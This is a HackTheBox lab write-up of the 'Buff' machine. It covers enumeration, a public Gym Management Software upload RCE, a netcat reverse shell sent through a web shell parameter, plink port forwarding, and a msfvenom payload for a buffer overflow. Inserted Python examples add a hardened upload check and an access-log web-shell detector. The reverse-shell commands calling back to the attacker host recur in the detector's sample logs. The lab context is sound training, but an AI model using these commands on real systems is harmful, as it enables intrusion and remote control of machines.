Buff (HTB)
First HackTheBox machine :) I've been loyal to TryHackMe for a while, but it's time to expand my learning resources.
HackTheBox – Buff Write-Up
topics: web application security, Windows privilege escalation, port forwarding, public exploits, buffer overflows
Enumeration
Local Privilege Escalation
System Privilege Escalation
new tools: plink
tools: nmapAutomator, dirsearch, searchsploit, curl, python, msfvenom
Enumeration
Initial nmap scan:
./nmapAutomator.sh $ip Basic
One port is open: 8080 (http-alt), running Apache httpd 2.4.43 (Win64). The http-title is mrb3n's Bro Hut, so mrb3n is a likely username. Let's run a vulnerability scan and visit the homepage.
./nmapAutomator.sh $ip Vulns
python3 dirsearch.py -u $ip -e php,html,txt
There are several subdirectories that are not linked from the homepage, including upload.php and register.php, which suggests places where a shell could potentially be uploaded. I didn't find anything on my initial inspection of the visible tabs on the homepage, so let's visit some of these pages.
I visited upload.php first, as it could potentially be the fastest way to achieve a shell.
This page shows a PHP error message: the page source complains that the parameter id is not recognised. This could indicate an LFI vulnerability or a way to upload a file of our choosing. We know the web server is Apache; let's try to identify the platform the website was built with to get more information.
Checking the main tabs on the homepage one more time, on the contact.php page we see the following message.
Local Privilege Escalation
Let's use searchsploit to search for Gym Management Software.
Inspecting the Python file reveals the following RCE vulnerability:
python /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
The exploit works by manipulating the Content-Type in the GET request so the server accepts the upload as a PNG image. What the Python program actually does is use PHP to fetch the system shell, which executes even though the file carries a PNG extension. We'll have to upgrade to a proper shell.
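The weakness described above is an upload check that trusts what the client claims about the file. The following is an added example (not code from the write-up or from the Gym Management Software project) that puts a check of that kind beside a hardened one which ignores Content-Type and validates only what the server can verify: the final extension against an allowlist, the file's magic bytes, and a server-generated filename so the client-chosen name never reaches disk. The allowlist, the function names and the sample bodies are constructed for the demonstration.

```python
import secrets

# Added example, not from the write-up or from the Gym Management Software project.
# Compares an upload check that trusts the client-supplied Content-Type (the
# weakness abused by the public exploit) with one that validates the file itself.

# Image types this hypothetical upload endpoint accepts, keyed by the final
# extension, with the magic bytes a genuine file of that type starts with.
ALLOWED_IMAGE_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_accepts(filename, content_type, data):
    """Weak check: trusts the Content-Type header the client sent.

    A file named kamehameha.php.png uploaded with Content-Type image/png passes
    even though its body is PHP, which is exactly what the exploit relies on.
    """
    return content_type.lower().startswith("image/")


def hardened_accepts(filename, content_type, data):
    """Hardened check: ignores Content-Type and validates the file itself.

    Returns the server-generated filename to store the file under, or None to
    reject. Only the final extension is considered and it must be in the
    allowlist; the body must begin with that type's magic bytes; and the file is
    renamed to a random name so the client-chosen name (and any double extension
    such as .php.png) never reaches disk. Store the result outside the web root,
    or in a directory where script execution is disabled.
    """
    ext = filename.rpartition(".")[2].lower()
    magic = ALLOWED_IMAGE_TYPES.get(ext)
    if magic is None:
        return None  # extension not in the allowlist (covers shell.php)
    if not data.startswith(magic):
        return None  # body is not the image type the extension claims
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample bodies for the demonstration below.
PHP_BODY = b"<?php echo 'not an image'; ?>"
PNG_BODY = ALLOWED_IMAGE_TYPES["png"] + b"\x00" * 16


def demo():
    """Run both checks over three constructed uploads.

    Returns (filename, weak_result, hardened_result) per case, where the
    hardened result is True when a storage name was produced.
    """
    cases = [
        ("kamehameha.php.png", "image/png", PHP_BODY),  # script disguised as PNG
        ("shell.php", "image/png", PHP_BODY),           # lying Content-Type
        ("photo.png", "image/png", PNG_BODY),           # genuine image
    ]
    results = []
    for name, ctype, body in cases:
        stored = hardened_accepts(name, ctype, body)
        results.append((name, weak_accepts(name, ctype, body), stored is not None))
    return results


if __name__ == "__main__":
    for name, weak, hard in demo():
        print(f"{name:22} weak={weak!s:5} hardened={hard}")
```

The weak check accepts all three uploads; the hardened check accepts only the genuine PNG, and even that is stored under a random name with a single safe extension.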
The exploit lists the parameter /upload/kamehameha.php?telepathy= for interacting with the shell and executing commands. Let's attempt to place a netcat executable and send cmd back through the URL.
On the attacker, copy nc.exe to the working directory and start a Python HTTP server. On the victim, download nc.exe with curl and write the output to nc.exe. Listen for the shell on the chosen port and enter "http://10.10.10.198:8080/upload/kamehameha.php?telepathy= nc.exe 10.10.15.16 4445 -e cmd.exe" in the URL.
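Every command sent through that URL leaves a line in the Apache access log. The following is an added example (not from the write-up) of detection logic that scans access-log lines in Apache's common log format for requests that execute a server-side script inside an upload directory, which is the trace left by interacting with a shell like the one above. The directory names, script extensions and the sample log lines are constructed assumptions to tune per deployment.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not from the write-up. Flags requests that execute a script
# inside an upload directory; such a directory should never serve executable
# scripts, so any hit is suspicious on its own. Directory and extension lists
# are assumptions to adjust for the deployment being monitored.
UPLOAD_DIRS = ("/upload/", "/uploads/")
SCRIPT_EXTS = (".php", ".phtml", ".phar")

# Apache common log format prefix: client, identd, user, timestamp,
# request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def find_webshell_hits(lines):
    """Return one dict per request for a script under an upload directory.

    The decoded query parameters are included so an analyst can see what was
    passed to the script (for a web shell, the commands that were run).
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognised access-log line
        parts = urlsplit(m.group("target"))
        path = parts.path.lower()
        if not path.startswith(UPLOAD_DIRS) or not path.endswith(SCRIPT_EXTS):
            continue
        params = {k: v[0] for k, v in parse_qs(parts.query).items()}
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "path": parts.path,
            "params": params,
        })
    return hits


# Constructed sample log lines modelled on the interaction described above.
SAMPLE_LOG = """\
10.10.15.16 - - [19/Jul/2020:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123
10.10.15.16 - - [19/Jul/2020:10:02:10 +0000] "POST /upload.php HTTP/1.1" 200 311
10.10.15.16 - - [19/Jul/2020:10:02:15 +0000] "GET /upload/kamehameha.php?telepathy=whoami HTTP/1.1" 200 45
10.10.15.16 - - [19/Jul/2020:10:03:00 +0000] "GET /upload/kamehameha.php?telepathy=nc.exe%2010.10.15.16%204445%20-e%20cmd.exe HTTP/1.1" 200 0
10.10.15.16 - - [19/Jul/2020:10:03:30 +0000] "GET /upload/avatar.png HTTP/1.1" 200 8123
""".splitlines()


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["path"]} {hit["params"]}')
```

The homepage request, the POST to upload.php (which is outside the upload directory) and the static image under /upload/ are ignored; only the two requests that execute kamehameha.php are reported, with the decoded commands. In production the same rule belongs in the web server's logging pipeline, backed by an Apache configuration that disables script execution under the upload directory in the first place.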
Administrator Privilege Escalation
Let's find out the CPU architecture of the machine in order to transfer and run winPEAS.
wmic OS get OSArchitecture
We are unable to transfer the file with smbserver; let's try certutil.
Both of our main methods of transferring files to Windows machines are blocked. Let's enumerate the user folders for something immediate before trying to run a privesc script.
There is nothing else in the Desktop folder besides the user flag. There was a batch file in the Documents folder, but based on the message, I'm assuming it's necessary for the website platform.
There is an executable file in the Downloads folder; checking it with searchsploit immediately reveals a buffer overflow exploit.
The exploit is written in Python, but Python is not installed on the victim. To use it, we'll have to forward the vulnerable service's port back to our local machine. We can use plink to do this (the default plink on Kali is outdated); the -R option below makes port 8888 on Kali reach 127.0.0.1:8888 on the victim, so the exploit can be run locally against localhost. Transfer the Windows executable from Kali using the original shell and run the command
plink.exe -l kali -pw kali 10.10.15.16 -R 8888:127.0.0.1:8888
The exploit provides the msfvenom command for creating a custom payload. We already have a netcat executable on the machine, so let's use that as the CMD value.
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.15.16 4444' -b '\x00\x0a\x0d' -f py -v payload
Replace the payload section of 48389.py with the above output, listen for the shell and run the exploit.